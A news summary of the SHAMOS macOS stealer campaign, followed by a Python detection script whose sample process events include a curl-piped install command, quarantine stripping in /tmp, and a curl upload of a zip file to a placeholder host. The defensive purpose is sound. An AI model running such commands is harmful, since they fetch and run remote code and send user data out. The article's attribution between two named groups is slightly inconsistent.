Over 300 Entities Fall Victim to Sophisticated macOS Malware Campaign
Over 300 entities have fallen victim to a sophisticated macOS malware campaign, dubbed SHAMOS, between June and August 2025. The variant of the Atomic macOS Stealer uses AppleScript to steal sensitive data and sends it via curl.
The SHAMOS variant installs itself in the /tmp/ directory, stripping file attributes to evade Apple's Gatekeeper protections. It runs checks to avoid sandboxes and targets a wide range of data, including cryptocurrency wallets, Keychain data, AppleNotes, and browser credentials. The cybercriminal group 'BirdMiner' is behind this campaign, selling access to compromised machines.
CrowdStrike blocked over 300 SHAMOS attacks by another group, 'COOKIE SPIDER', during the same period. The malware was spread via malvertising, luring victims to fake macOS help sites with a one-line install command. Threat actors spoofed an Australia-based store in Google Ads to promote these fake sites, bypassing Gatekeeper checks. The SHAMOS variant can steal data from multiple browsers and cryptowallets, including Electrum, Binance, Exodus, Atomic, and Coinomi.
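As an added illustration (not from the article or from CrowdStrike's analysis), the script below turns the behaviours described above into simple detection heuristics run over constructed process-event lines: a curl-piped one-line install, quarantine attributes stripped from a file under /tmp, AppleScript executed from /tmp, and a curl upload. The log format, rule patterns, sample commands and the example.invalid host are all assumptions.

```python
import re

# Constructed sample process events (not real telemetry). Format per line:
#   <pid>|<parent image>|<image>|<command line>
# The command line may itself contain "|", so it is always the last field.
SAMPLE_EVENTS = """\
101|/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal|/bin/bash|bash -c "curl -fsSL http://example.invalid/install.sh | bash"
102|/bin/bash|/usr/bin/xattr|xattr -c /tmp/update
103|/bin/bash|/usr/bin/osascript|osascript /tmp/update/collect.scpt
104|/bin/bash|/usr/bin/curl|curl -X POST -F file=@/tmp/out.zip http://example.invalid/upload
105|/Applications/Xcode.app/Contents/MacOS/Xcode|/usr/bin/xattr|xattr -p com.apple.quarantine /Users/dev/Downloads/tool.dmg
106|/bin/zsh|/usr/bin/curl|curl -sS https://example.invalid/release-notes.txt
"""

# Assumed heuristics, one per stage of the chain the write-up describes.
RULES = [
    # one-line install: curl output piped straight into a shell
    ("piped_install", re.compile(r"curl\b.*\|\s*(ba)?sh\b")),
    # extended attributes (quarantine flag) removed from something in /tmp
    ("xattr_strip_tmp", re.compile(r"\bxattr\s+-(c|d\s+com\.apple\.quarantine)\b.*\s/tmp/")),
    # AppleScript run from the staging directory
    ("osascript_from_tmp", re.compile(r"\bosascript\b.*\s/tmp/")),
    # curl used to send data out rather than fetch it
    ("curl_upload", re.compile(r"\bcurl\b.*(\s-F\s|\s--data|\s-d\s|\s-T\s|--upload-file)")),
]


def scan_events(text: str) -> list[tuple[int, str]]:
    """Return (pid, rule_name) for every event whose command line trips a rule."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, _parent, _image, cmdline = line.split("|", 3)
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((int(pid), name))
    return hits


def is_suspicious_chain(text: str, min_stages: int = 3) -> bool:
    """Flag the log when enough distinct stages of the chain appear together.

    Any single rule can fire on legitimate admin activity (rule 105/106 above
    do not fire at all); requiring several stages keeps the false-positive
    rate manageable for an alert.
    """
    stages = {name for _, name in scan_events(text)}
    return len(stages) >= min_stages


if __name__ == "__main__":
    for pid, rule in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
    print("suspicious chain:", is_suspicious_chain(SAMPLE_EVENTS))
```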
The SHAMOS campaign highlights the growing threat of macOS malware, with cybercriminals employing sophisticated tactics to steal sensitive data. Security experts urge users to be cautious when browsing and to keep their systems updated to protect against such threats.